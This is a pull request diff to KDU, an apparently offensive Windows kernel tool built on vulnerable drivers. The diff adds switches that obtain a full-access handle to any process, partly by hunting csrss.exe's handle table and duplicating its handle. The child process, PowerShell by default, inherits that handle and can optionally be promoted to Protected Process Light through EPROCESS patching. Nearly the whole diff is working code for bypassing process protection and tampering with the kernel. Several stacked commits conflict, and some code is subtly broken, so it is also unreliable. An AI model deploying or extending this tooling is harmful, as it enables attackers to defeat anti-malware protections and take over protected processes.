### PR TITLE
Open any process and inherit the full access handle

### DIFF
--- a/README.md
+++ b/README.md
@@ -13,7 +13,7 @@
 
 The purpose of this tool is to provide a simple way to explore the Windows kernel/components without requiring extensive setup or a local debugger.
 It features:
-+ Protected Process Hijacking via Process object modification;
++ Protected Process Hijacking via arbitrary PPL or arbitrary Process Handles, both through EPROCESS object modification;
 + Driver Signature Enforcement Overrider (similar to DSEFix);
 + Driver loader for bypassing Driver Signature Enforcement (similar to TDL/Stryker);
 + Support for various vulnerable drivers used as functionality "providers".
@@ -26,6 +26,8 @@ It features:
 ###### KDU -prv ProviderID
 ###### KDU -ps ProcessID
 ###### KDU -pse Commandline
+###### KDU -psw Commandline
+###### KDU -pho ProcessID
 ###### KDU -dmp ProcessID
 ###### KDU -dse value
 ###### KDU -map filename
@@ -36,6 +38,9 @@ It features:
 * -ps   - modify process object of given ProcessID, downgrading any protections;
 * -pse  - launch program as ProtectedProcessLight-AntiMalware (PPL);
 * -psw  - launch program as ProtectedProcessLight-WinTcb (PPL);
+* -pho  - open an arbitrary process with full access
+  * -phc - commandline (child process) to inerit the flag, default powershell
+  * -phe - also start the child process as ppl
 * -dmp  - dump virtual memory of the given process;
 * -dse  - write user-defined value to the system DSE state flags;
 * -map  - map driver to the kernel and execute its entry point; this command has dependencies listed below;
@@ -55,6 +60,7 @@ Example:
 + kdu -dse 6
 + kdu -pse "C:\Windows\System32\notepad.exe C:\TEMP\words.txt"
 + kdu -psw "C:\Windows\System32\cmd.exe"
++ kdu -pho 1234 -phe 3
 + kdu -listcsv "c:\kdu\out.csv"
 
 Run on Windows 11 24H2*

--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -750,7 +750,22 @@ BOOL KDUProviderVerifyActionType(
         return FALSE;
     }
 
+    // TODO: why 2 separate switches?
+    // 1st check the relevant primitives
     switch (ActionType) {
+
+    case ActionTypeDuplicateHandle:
+
+        if (Provider->Callbacks.OpenProcess == NULL)
+        {
+            supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary process handle acquisition or\r\n"\
+                "\tKDU interface is not implemented for this method.\r\n");
+            return FALSE;
+
+        }
+
+		// do not break, DupHandle also needs Read/Write primitives (I didn't find a more efficient way)
+
     case ActionTypeDKOM:
     case ActionTypeMapDriver:
     case ActionTypeDSECorruption:
@@ -796,7 +811,6 @@ BOOL KDUProviderVerifyActionType(
         break;
 
     case ActionTypeDumpProcess:
-    case ActionTypeDuplicateHandle:
 
         if (Provider->Callbacks.OpenProcess == NULL) {
 
@@ -812,6 +826,7 @@ BOOL KDUProviderVerifyActionType(
         break;
     }
 
+    // 2nd set callbacks
     switch (ActionType) {
 
     case ActionTypeDKOM:

--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -750,11 +750,10 @@ BOOL KDUProviderVerifyActionType(
         return FALSE;
     }
 
-    // TODO: why 2 separate switches?
     // 1st check the relevant primitives
     switch (ActionType) {
 
-    case ActionTypeDuplicateHandle:
+    case ActionTypeOpenProcessHandle:
 
         if (Provider->Callbacks.OpenProcess == NULL)
         {
@@ -765,8 +764,8 @@ BOOL KDUProviderVerifyActionType(
         }
 
         break; 
-        // in case the access rights need to be modified, DupHandle also needs to have read/write
-        // but I guess it's better to fail when r/w is required, then to fail here when r/w would maybe not be required
+        // in case the access rights need to be modified, -pho also needs to have read/write
+        // but I guess it's better to fail when r/w is required later, then to fail here when r/w would maybe not be required
 
     case ActionTypeDKOM:
     case ActionTypeMapDriver:

--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -796,6 +796,7 @@ BOOL KDUProviderVerifyActionType(
         break;
 
     case ActionTypeDumpProcess:
+    case ActionTypeDuplicateHandle:
 
         if (Provider->Callbacks.OpenProcess == NULL) {
 

--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -764,7 +764,9 @@ BOOL KDUProviderVerifyActionType(
 
         }
 
-		// do not break, DupHandle also needs Read/Write primitives (I didn't find a more efficient way)
+        break; 
+        // in case the access rights need to be modified, DupHandle also needs to have read/write
+        // but I guess it's better to fail when r/w is required, then to fail here when r/w would maybe not be required
 
     case ActionTypeDKOM:
     case ActionTypeMapDriver:

--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -151,7 +151,7 @@ typedef enum _KDU_ACTION_TYPE {
     ActionTypeDKOM,
     ActionTypeDSECorruption,
     ActionTypeDumpProcess,
-    ActionTypeDuplicateHandle,
+    ActionTypeOpenProcessHandle,
     ActionTypeUnspecified,
     ActionTypeMax
 } KDU_ACTION_TYPE;

--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -151,6 +151,7 @@ typedef enum _KDU_ACTION_TYPE {
     ActionTypeDKOM,
     ActionTypeDSECorruption,
     ActionTypeDumpProcess,
+    ActionTypeDuplicateHandle,
     ActionTypeUnspecified,
     ActionTypeMax
 } KDU_ACTION_TYPE;

--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -189,7 +189,7 @@ INT KDUOpenProcessInheritHandle(
         HvciEnabled,
         NtBuildNumber,
         KDU_SHELLCODE_NONE,
-        ActionTypeDuplicateHandle);
+        ActionTypeOpenProcessHandle);
 
     if (provContext) {
         bResult = KDURunCommandInheritee(provContext, CommandLine, TargetProcessId, PPLLevel);

--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -723,7 +723,7 @@ INT KDUProcessCommandLine(
                     processId = strtou64(szParameter);
 
                     WCHAR szCmdLine[MAX_PATH] = { 0 };
-                    wcscpy_s(szCmdLine, L"powershell.exe"); // default command line
+                    _strcpy(szCmdLine, L"powershell.exe"); // default command line
 
                     ULONG_PTR level = 0;
 

--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -28,6 +28,8 @@
 #define CMD_PM          L"-pm"
 #define CMD_PM1         L"-pm1"
 #define CMD_PM2         L"-pm2"
+#define CMD_DPH         L"-dph"
+#define CMD_DCL         L"-dcl"
 #define CMD_DMP         L"-dmp"
 #define CMD_DSE         L"-dse"
 #define CMD_LIST        L"-list"
@@ -53,6 +55,8 @@
                      "kdu -pm pid         - Overwrites Process MitigationsFlags1 and 2 with 0x0 for given pid\r\n"\
                      "kdu -pm1 pid        - Overwrites Process MitigationsFlags1 with 0x0 for given pid\r\n"\
                      "kdu -pm2 pid        - Overwrites Process MitigationsFlags2 with 0x0 for given pid\r\n"\
+                     "kdu -dph trg      - Duplicate a csrss Process Handle (csrss->target) to the new command to be executed\r\n"\
+                     "kdu -dpc cmdline  - The Command Line to be executed with the Duplicated handle (or powershell.exe as default)\r\n"\
                      "kdu -dse value      - Write user defined value to the system DSE state flags\r\n"\
                      "kdu -map filename   - Map driver to the kernel and execute it entry point, this command have dependencies listed below\r\n"\
                      "-scv version        - Optional, select shellcode version, default 1\r\n"\
@@ -156,6 +160,40 @@ INT KDUProcessPMObjectSwitch(
     }
 
     return retVal;
+}
+
+/*
+* KDUDuplicateProcessHandleSwitch
+*
+* Purpose:
+*
+* Handle -dph switch.
+*
+*/
+INT KDUDuplicateProcessHandleSwitch(
+    _In_ ULONG HvciEnabled,
+    _In_ ULONG NtBuildNumber,
+    _In_ ULONG ProviderId,
+    _In_ ULONG_PTR TargetProcessId,
+    _In_ LPWSTR CommandLine
+)
+{
+    HANDLE retVal = NULL;
+    BOOL bResult = FALSE;
+    KDU_CONTEXT* provContext;
+
+    provContext = KDUProviderCreate(ProviderId,
+        HvciEnabled,
+        NtBuildNumber,
+        KDU_SHELLCODE_NONE,
+        ActionTypeDuplicateHandle);
+
+    if (provContext) {
+        bResult = KDURunCommandDup(provContext, CommandLine, TargetProcessId, &retVal);
+        KDUProviderRelease(provContext);
+    }
+
+    return retVal != 0;
 }
 
 /*
@@ -671,6 +709,32 @@ INT KDUProcessCommandLine(
                         providerId,
                         szParameter, 
                         TRUE);
+                }
+
+                else if (supGetCommandLineOption(CMD_DPH,
+                    TRUE,
+                    szParameter,
+                    RTL_NUMBER_OF(szParameter),
+                    NULL))
+                {
+                    processId = strtou64(szParameter);
+
+                    WCHAR szCmdLine[MAX_PATH] = { 0 };
+                    wcscpy_s(szCmdLine, L"powershell.exe"); // default command line
+
+                    if (supGetCommandLineOption(CMD_DCL,
+                        TRUE,
+                        szParameter,
+                        RTL_NUMBER_OF(szParameter),
+                        NULL))
+                    {
+                        wcscpy_s(szCmdLine, szParameter);
+                    }
+                    retVal = KDUDuplicateProcessHandleSwitch(HvciEnabled,
+                        NtBuildNumber,
+                        providerId,
+                        processId,
+                        szCmdLine);
                 }
 
                 else if (supGetCommandLineOption(CMD_DMP,

--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -28,8 +28,9 @@
 #define CMD_PM          L"-pm"
 #define CMD_PM1         L"-pm1"
 #define CMD_PM2         L"-pm2"
-#define CMD_DPH         L"-dph"
-#define CMD_DCL         L"-dcl"
+#define CMD_PHO         L"-pho"
+#define CMD_PHC         L"-phc"
+#define CMD_PHE         L"-phe"
 #define CMD_DMP         L"-dmp"
 #define CMD_DSE         L"-dse"
 #define CMD_LIST        L"-list"
@@ -55,8 +56,9 @@
                      "kdu -pm pid         - Overwrites Process MitigationsFlags1 and 2 with 0x0 for given pid\r\n"\
                      "kdu -pm1 pid        - Overwrites Process MitigationsFlags1 with 0x0 for given pid\r\n"\
                      "kdu -pm2 pid        - Overwrites Process MitigationsFlags2 with 0x0 for given pid\r\n"\
-                     "kdu -dph trg      - Duplicate a csrss Process Handle (csrss->target) to the new command to be executed\r\n"\
-                     "kdu -dpc cmdline  - The Command Line to be executed with the Duplicated handle (or powershell.exe as default)\r\n"\
+                     "kdu -pho pid        - Open a Process Handle to the given pid, patches the handle to full access in case of stripping, sets inherit to true and starts a child process, powershell default\r\n"\
+                     "kdu -phc cmdline    - The command line of the new child process that inherits the full access process handle, only with pho\r\n"\
+                     "kdu -phe ppllevel   - The ppl level of the new child process, (none) 0-6 (max), only with pho\r\n"\
                      "kdu -dse value      - Write user defined value to the system DSE state flags\r\n"\
                      "kdu -map filename   - Map driver to the kernel and execute it entry point, this command have dependencies listed below\r\n"\
                      "-scv version        - Optional, select shellcode version, default 1\r\n"\
@@ -170,11 +172,12 @@ INT KDUProcessPMObjectSwitch(
 * Handle -dph switch.
 *
 */
-INT KDUDuplicateProcessHandleSwitch(
+INT KDUOpenProcessInheritHandle(
     _In_ ULONG HvciEnabled,
     _In_ ULONG NtBuildNumber,
     _In_ ULONG ProviderId,
     _In_ ULONG_PTR TargetProcessId,
+    _In_ ULONG_PTR PPLLevel,
     _In_ LPWSTR CommandLine
 )
 {
@@ -189,7 +192,7 @@ INT KDUDuplicateProcessHandleSwitch(
         ActionTypeDuplicateHandle);
 
     if (provContext) {
-        bResult = KDURunCommandDup(provContext, CommandLine, TargetProcessId, &retVal);
+        bResult = KDURunCommandInheritee(provContext, CommandLine, TargetProcessId, PPLLevel);
         KDUProviderRelease(provContext);
     }
 
@@ -645,14 +648,14 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                {
-                    processId = strtou64(szParameter);
+                    {
+                        processId = strtou64(szParameter);
 
-                    retVal = KDUProcessPMObjectSwitch(HvciEnabled,
-                        NtBuildNumber,
-                        providerId,
-                        processId,
-                        PS_MITIGATION_FLAGS1 | PS_MITIGATION_FLAGS2);
+                        retVal = KDUProcessPMObjectSwitch(HvciEnabled,
+                            NtBuildNumber,
+                            providerId,
+                            processId,
+                            PS_MITIGATION_FLAGS1 | PS_MITIGATION_FLAGS2);
                 }
 
                 else if (supGetCommandLineOption(CMD_PM1,
@@ -660,14 +663,14 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                {
-                    processId = strtou64(szParameter);
+                    {
+                        processId = strtou64(szParameter);
 
-                    retVal = KDUProcessPMObjectSwitch(HvciEnabled,
-                        NtBuildNumber,
-                        providerId,
-                        processId,
-                        PS_MITIGATION_FLAGS1);
+                        retVal = KDUProcessPMObjectSwitch(HvciEnabled,
+                            NtBuildNumber,
+                            providerId,
+                            processId,
+                            PS_MITIGATION_FLAGS1);
                 }
 
                 else if (supGetCommandLineOption(CMD_PM2,
@@ -675,14 +678,14 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                {
-                    processId = strtou64(szParameter);
+                    {
+                        processId = strtou64(szParameter);
 
-                    retVal = KDUProcessPMObjectSwitch(HvciEnabled,
-                        NtBuildNumber,
-                        providerId,
-                        processId,
-                        PS_MITIGATION_FLAGS2);
+                        retVal = KDUProcessPMObjectSwitch(HvciEnabled,
+                            NtBuildNumber,
+                            providerId,
+                            processId,
+                            PS_MITIGATION_FLAGS2);
                 }
 
                 else if (supGetCommandLineOption(CMD_PSE,
@@ -690,12 +693,12 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                {
-                    retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
-                        NtBuildNumber,
-                        providerId,
-                        szParameter,
-                        FALSE);
+                    {
+                        retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
+                            NtBuildNumber,
+                            providerId,
+                            szParameter,
+                            FALSE);
                 }
 
                 else if (supGetCommandLineOption(CMD_PSW,
@@ -703,26 +706,28 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                {
-                    retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
-                        NtBuildNumber,
-                        providerId,
-                        szParameter, 
-                        TRUE);
+                    {
+                        retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
+                            NtBuildNumber,
+                            providerId,
+                            szParameter,
+                            TRUE);
                 }
 
-                else if (supGetCommandLineOption(CMD_DPH,
+                else if (supGetCommandLineOption(CMD_PHO,
                     TRUE,
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                {
+                    {
                     processId = strtou64(szParameter);
 
                     WCHAR szCmdLine[MAX_PATH] = { 0 };
                     wcscpy_s(szCmdLine, L"powershell.exe"); // default command line
 
-                    if (supGetCommandLineOption(CMD_DCL,
+                    ULONG_PTR level = 0;
+
+                    if (supGetCommandLineOption(CMD_PHC,
                         TRUE,
                         szParameter,
                         RTL_NUMBER_OF(szParameter),
@@ -730,10 +735,26 @@ INT KDUProcessCommandLine(
                     {
                         wcscpy_s(szCmdLine, szParameter);
                     }
-                    retVal = KDUDuplicateProcessHandleSwitch(HvciEnabled,
+
+                    if (supGetCommandLineOption(CMD_PHE,
+                        TRUE,
+                        szParameter,
+                        RTL_NUMBER_OF(szParameter),
+                        NULL))
+                    {
+                        level = strtou64(szParameter);
+                        if (level < 0 || level > 8) {
+                            supPrintfEvent(kduEventError,
+                                "[!] Unsupported PPL level for Open Process Handle\r\n");
+                            return 1;
+                        }
+                    }
+
+                    retVal = KDUOpenProcessInheritHandle(HvciEnabled,
                         NtBuildNumber,
                         providerId,
                         processId,
+                        level,
                         szCmdLine);
                 }
 

--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -648,14 +648,14 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                    {
-                        processId = strtou64(szParameter);
+                {
+                    processId = strtou64(szParameter);
 
-                        retVal = KDUProcessPMObjectSwitch(HvciEnabled,
-                            NtBuildNumber,
-                            providerId,
-                            processId,
-                            PS_MITIGATION_FLAGS1 | PS_MITIGATION_FLAGS2);
+                    retVal = KDUProcessPMObjectSwitch(HvciEnabled,
+                        NtBuildNumber,
+                        providerId,
+                        processId,
+                        PS_MITIGATION_FLAGS1 | PS_MITIGATION_FLAGS2);
                 }
 
                 else if (supGetCommandLineOption(CMD_PM1,
@@ -663,14 +663,14 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                    {
-                        processId = strtou64(szParameter);
+                {
+                    processId = strtou64(szParameter);
 
-                        retVal = KDUProcessPMObjectSwitch(HvciEnabled,
-                            NtBuildNumber,
-                            providerId,
-                            processId,
-                            PS_MITIGATION_FLAGS1);
+                    retVal = KDUProcessPMObjectSwitch(HvciEnabled,
+                        NtBuildNumber,
+                        providerId,
+                        processId,
+                        PS_MITIGATION_FLAGS1);
                 }
 
                 else if (supGetCommandLineOption(CMD_PM2,
@@ -678,14 +678,14 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                    {
-                        processId = strtou64(szParameter);
+                {
+                    processId = strtou64(szParameter);
 
-                        retVal = KDUProcessPMObjectSwitch(HvciEnabled,
-                            NtBuildNumber,
-                            providerId,
-                            processId,
-                            PS_MITIGATION_FLAGS2);
+                    retVal = KDUProcessPMObjectSwitch(HvciEnabled,
+                        NtBuildNumber,
+                        providerId,
+                        processId,
+                        PS_MITIGATION_FLAGS2);
                 }
 
                 else if (supGetCommandLineOption(CMD_PSE,
@@ -693,12 +693,12 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                    {
-                        retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
-                            NtBuildNumber,
-                            providerId,
-                            szParameter,
-                            FALSE);
+                {
+                    retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
+                        NtBuildNumber,
+                        providerId,
+                        szParameter,
+                        FALSE);
                 }
 
                 else if (supGetCommandLineOption(CMD_PSW,
@@ -706,12 +706,12 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                    {
-                        retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
-                            NtBuildNumber,
-                            providerId,
-                            szParameter,
-                            TRUE);
+                {
+                    retVal = KDUProcessPSEObjectSwitch(HvciEnabled,
+                        NtBuildNumber,
+                        providerId,
+                        szParameter,
+                        TRUE);
                 }
 
                 else if (supGetCommandLineOption(CMD_PHO,
@@ -719,7 +719,7 @@ INT KDUProcessCommandLine(
                     szParameter,
                     RTL_NUMBER_OF(szParameter),
                     NULL))
-                    {
+                {
                     processId = strtou64(szParameter);
 
                     WCHAR szCmdLine[MAX_PATH] = { 0 };

--- a/Source/Hamakaze/provlist.cpp
+++ b/Source/Hamakaze/provlist.cpp
@@ -185,7 +185,7 @@ LPCSTR KDUProvSourceBaseToString(
 VOID KDUProvFormatHex(
     _In_ PBYTE Data,
     _In_ ULONG DataSize,
-    _Out_ PCHAR OutputBuffer,
+    _Out_writes_bytes_(OutputBufferChars) PCHAR OutputBuffer,
     _In_ ULONG OutputBufferChars
 )
 {

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -995,6 +995,7 @@ BOOL KDURunCommandInheritee(
     si.cb = sizeof(si);
     ZeroMemory(&pi, sizeof(pi));
 
+    // check if process can be started (no PPL) or created suspended to patch PPL
     DWORD creationOptions;
     if (PPLLevel > 0) {
         wprintf_s(L"[+] Creating suspended Process '%s'\r\n", CommandLine);
@@ -1005,15 +1006,13 @@ BOOL KDURunCommandInheritee(
         creationOptions = NULL;
     }
 
-
-    // process can be started directly, 
     if (!CreateProcess(
         NULL,               // No module name (use command line)
         CommandLine,        // Command line
         NULL,               // Process handle not inheritable
         NULL,               // Thread handle not inheritable
         TRUE,               // Do inherit inheritable handles
-        creationOptions,
+        creationOptions,    // according to given PPL, see above
         NULL,               // Use parent's environment block
         NULL,               // Use parent's starting directory 
         &si,                // Pointer to STARTUPINFO structure
@@ -1029,7 +1028,7 @@ BOOL KDURunCommandInheritee(
         printf_s("[!] Capped the PPL level at 7\n");
     }
 
-    // when suspended, patch PPL and resume
+    // patch PPL and resume
     if (PPLLevel > 0 and PPLLevel < 8) {
 
         DWORD dwThreadResumeCount = 0;

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -1025,6 +1025,11 @@ BOOL KDURunCommandInheritee(
     }
     printf_s("[+] Created Process with PID %lu\r\n", pi.dwProcessId);
 
+    if (PPLLevel >= 7) {
+        PPLLevel = 7;
+        printf_s("[!] Capped the PPL level at 7\n");
+    }
+
     // when suspended, patch PPL and resume
     if (PPLLevel > 0 and PPLLevel < 8) {
 

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
@@ -19,6 +19,7 @@
 
 #include "global.h"
 #include <Dbghelp.h>
+#include <TlHelp32.h>
 
 typedef BOOL(WINAPI* pfnMiniDumpWriteDump)(
     _In_ HANDLE hProcess,
@@ -683,4 +684,256 @@ BOOL KDUControlProcessMitigationFlags(
     FUNCTION_LEAVE_MSG(__FUNCTION__);
 
     return bResult1 && bResult2;
+}
+
+/*
+* KDURunCommandDup
+*
+* Purpose:
+*
+* Start a Process to duplicate a handle into
+*
+*/
+BOOL KDURunCommandDup(
+    _In_ PKDU_CONTEXT Context,
+    _In_ LPWSTR CommandLine,
+    _In_ ULONG_PTR TargetProcessId,
+    _Out_ HANDLE dupHandle)
+{
+    BOOL       bResult = FALSE;
+    DWORD      dwThreadResumeCount = 0;
+    dupHandle = { 0 };
+
+    // find csrss.exe with tlhelp and store as SourceProcessId
+    ULONG_PTR SourceProcessId = 0;
+    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (hSnapshot == INVALID_HANDLE_VALUE) {
+        supShowWin32Error("[!] Failed to create process snapshot", GetLastError());
+        return FALSE;
+    }
+    PROCESSENTRY32 pe;
+    pe.dwSize = sizeof(PROCESSENTRY32);
+    if (Process32First(hSnapshot, &pe)) {
+        do {
+            if (_wcsicmp(pe.szExeFile, L"csrss.exe") == 0) {
+                SourceProcessId = pe.th32ProcessID;
+                break;
+            }
+        } while (Process32Next(hSnapshot, &pe));
+    }
+    CloseHandle(hSnapshot);
+    if (SourceProcessId == 0) {
+        printf_s("[!] Failed to find csrss.exe process\n");
+        return FALSE;
+    }
+
+    STARTUPINFO si;
+    PROCESS_INFORMATION pi;
+
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+    ZeroMemory(&pi, sizeof(pi));
+
+    wprintf_s(L"[+] Creating Process '%s'\r\n", CommandLine);
+
+    bResult = CreateProcess(
+        NULL,               // No module name (use command line)
+        CommandLine,        // Command line
+        NULL,               // Process handle not inheritable
+        NULL,               // Thread handle not inheritable
+        FALSE,              // Set handle inheritance to FALSE
+        CREATE_SUSPENDED,   // Create Process suspended so we can edit
+        // its protection level prior to starting
+        NULL,               // Use parent's environment block
+        NULL,               // Use parent's starting directory 
+        &si,                // Pointer to STARTUPINFO structure
+        &pi);               // Pointer to PROCESS_INFORMATION structure
+    if (!bResult) {
+        supShowWin32Error("[!] Failed to create process", GetLastError());
+        return bResult;
+    }
+    printf_s("[+] Created Process with PID %lu\r\n", pi.dwProcessId);
+
+    bResult = KDUDuplicateProcessHandle(Context, pi.hProcess, SourceProcessId, TargetProcessId, &dupHandle);
+    if (!bResult) {
+        supShowWin32Error("[!] Failed to duplicate handle", GetLastError());
+        return bResult;
+    }
+
+    dwThreadResumeCount = ResumeThread(pi.hThread);
+    if (dwThreadResumeCount != 1) {
+        printf_s("[!] Failed to resume process: %lu | 0x%lX\n", dwThreadResumeCount, GetLastError());
+        return bResult;
+    }
+
+    // Wait until child process exits.
+    WaitForSingleObject(pi.hProcess, INFINITE);
+
+    // Close process and thread handles.
+    CloseHandle(pi.hProcess);
+    CloseHandle(pi.hThread);
+
+    return bResult;
+}
+
+// Helper function to find a handle with PROCESS_ALL_ACCESS rights to TargetPid in SourcePid process and return it for duplication
+HANDLE FindProcessHandle(ULONG_PTR sourcePid, HANDLE hTargetProcess, ULONG_PTR targetPid) {
+    printf_s("[*] Searching for a handle with PROCESS_ALL_ACCESS to target process %llu in source process %llu\r\n", targetPid, sourcePid);
+
+    ULONG bufferSize = 0x4000; // Start with a 16KB buffer
+    PVOID buffer = ntsupVirtualAlloc((SIZE_T)bufferSize);
+    if (!buffer) return NULL;
+
+    NTSTATUS ntStatus = NtQuerySystemInformation(
+        (SYSTEM_INFORMATION_CLASS)SystemHandleInformation,
+        buffer,
+        bufferSize,
+        &bufferSize
+    );
+
+    // Reallocate if the process contains more handles than expected
+    if (ntStatus == STATUS_INFO_LENGTH_MISMATCH) {
+        ntsupVirtualFree(buffer);
+
+        buffer = ntsupVirtualAlloc((SIZE_T)bufferSize);
+        if (!buffer) {
+            printf_s("[!] Failed to allocate buffer for handle information\r\n");
+            return NULL;
+        }
+
+        ntStatus = NtQuerySystemInformation(
+            (SYSTEM_INFORMATION_CLASS)SystemHandleInformation,
+            buffer,
+            bufferSize,
+            &bufferSize
+        );
+    }
+
+    if (!NT_SUCCESS(ntStatus)) {
+        if (buffer) ntsupVirtualFree(buffer);
+        printf_s("[!] Failed to query process handle information from source process\r\n");
+        return NULL;
+    }
+
+    printf_s("[*] Source process has %llu handles\r\n", ((PPROCESS_HANDLE_SNAPSHOT_INFORMATION)buffer)->NumberOfHandles);
+
+    HANDLE hFoundHandle = NULL;
+    PSYSTEM_HANDLE_INFORMATION handleInfo = (PSYSTEM_HANDLE_INFORMATION)buffer;
+    PVOID targetEprocessAddress = NULL;
+    ULONG_PTR currentPid = GetCurrentProcessId();
+
+    // Resolve Target Process' kernel EPROCESS address by looking up kdu.exe's open handle
+    for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++) {
+        SYSTEM_HANDLE_TABLE_ENTRY_INFO entry = handleInfo->Handles[i];
+
+        if (entry.UniqueProcessId == currentPid) {
+
+            // Match the handle value that KDUOpenProcess gave us for the target
+            if ((HANDLE)(ULONG_PTR)entry.HandleValue == hTargetProcess) {
+                targetEprocessAddress = entry.Object;
+                break;
+            }
+        }
+    }
+    if (targetEprocessAddress == NULL) {
+        printf_s("[!] Failed to resolve target process EPROCESS kernel pointer\r\n");
+        ntsupVirtualFree(buffer);
+        return NULL;
+    }
+
+    printf_s("[*] Resolved target process EPROCESS kernel pointer: 0x%p\n", targetEprocessAddress);
+
+    // Find the handle inside Source Process (csrss.exe) pointing to that kernel address
+    for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++) {
+        SYSTEM_HANDLE_TABLE_ENTRY_INFO entry = handleInfo->Handles[i];
+
+        if (entry.UniqueProcessId == sourcePid) { // must be owned by the source process (csrss.exe)
+
+            if (entry.Object == targetEprocessAddress) { // must point to the target process EPROCESS in kernel
+
+                if ((entry.GrantedAccess & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS) {
+
+                    hFoundHandle = (HANDLE)(ULONG_PTR)entry.HandleValue;
+                    printf_s("[+] Found valid handle value! Handle: 0x%p (Access: 0x%lX)\n",
+                        hFoundHandle, entry.GrantedAccess);
+                    break;
+                }
+            }
+        }
+    }
+
+    ntsupVirtualFree(buffer);
+    return hFoundHandle;
+}
+
+/*
+* KDUDuplicateProcessHandle
+*
+* Purpose:
+*
+* Duplicates a process handle with PROCESS_ALL_ACCESS rights to our new process.
+*
+*/
+BOOL KDUDuplicateProcessHandle(
+    _In_ PKDU_CONTEXT Context,
+    _In_ HANDLE hNewProcess,
+    _In_ ULONG_PTR SourceProcessId,
+    _In_ ULONG_PTR TargetProcessId,
+    _Out_ PHANDLE DupHandle
+)
+{
+    BOOL bResult = FALSE;
+    HANDLE hSourceProcess = NULL, hTargetProcess = NULL;
+
+    FUNCTION_ENTER_MSG(__FUNCTION__);
+
+    bResult = KDUOpenProcess(Context, (HANDLE)SourceProcessId, PROCESS_DUP_HANDLE, &hSourceProcess);
+    if (bResult && hSourceProcess != NULL) {
+        printf_s("[+] Process with PID %llu opened (PROCESS_DUP_HANDLE)\r\n", SourceProcessId);
+
+        bResult = KDUOpenProcess(Context, (HANDLE)TargetProcessId, PROCESS_DUP_HANDLE, &hTargetProcess);
+        if (bResult && hTargetProcess != NULL) {
+            printf_s("[+] Process with PID %llu opened (PROCESS_DUP_HANDLE)\r\n", TargetProcessId);
+
+            // search for the handle in sourceProcess with PROCESS_ALL_ACCESS on targetProcess, to duplicate into the newProcess
+            HANDLE hSourceProcessHandleToDup = FindProcessHandle(SourceProcessId, hTargetProcess, TargetProcessId);
+            if (hSourceProcessHandleToDup != NULL) {
+
+                bResult = NtDuplicateObject(hSourceProcess,
+                    hSourceProcessHandleToDup,
+                    hNewProcess,
+                    DupHandle,
+                    PROCESS_ALL_ACCESS,
+                    TRUE,      // OBJ_INHERIT (for the new process to use)
+                    DUPLICATE_SAME_ACCESS
+                );
+                if (bResult) {
+                    printf_s("[+] Duplicated process handle to new process\r\n");
+                }
+                else {
+                    supShowHardError("[!] Failed to duplicate process handle", bResult);
+                    bResult = FALSE;
+                }
+                NtClose(hTargetProcess);
+            }
+            else {
+                printf_s("[!] Failed to find a handle with PROCESS_ALL_ACCESS to target process %llu in source process %llu\n", TargetProcessId, SourceProcessId);
+                bResult = FALSE;
+            }
+        }
+        else {
+            supShowHardError("[!] Cannot open target process", bResult);
+        }
+        NtClose(hSourceProcess);
+    }
+    else {
+        supShowHardError("[!] Cannot open source process", bResult);
+    }
+    FUNCTION_LEAVE_MSG(__FUNCTION__);
+
+    if (!bResult) {
+        printf_s("[!] Handle duplication failed. Check if the source process has a handle with PROCESS_ALL_ACCESS to the target process.\n");
+        *DupHandle = NULL;
+    }
+    return bResult;
 }

--- a/Source/Hamakaze/ps.cpp
+++ b/Source/Hamakaze/ps.cpp
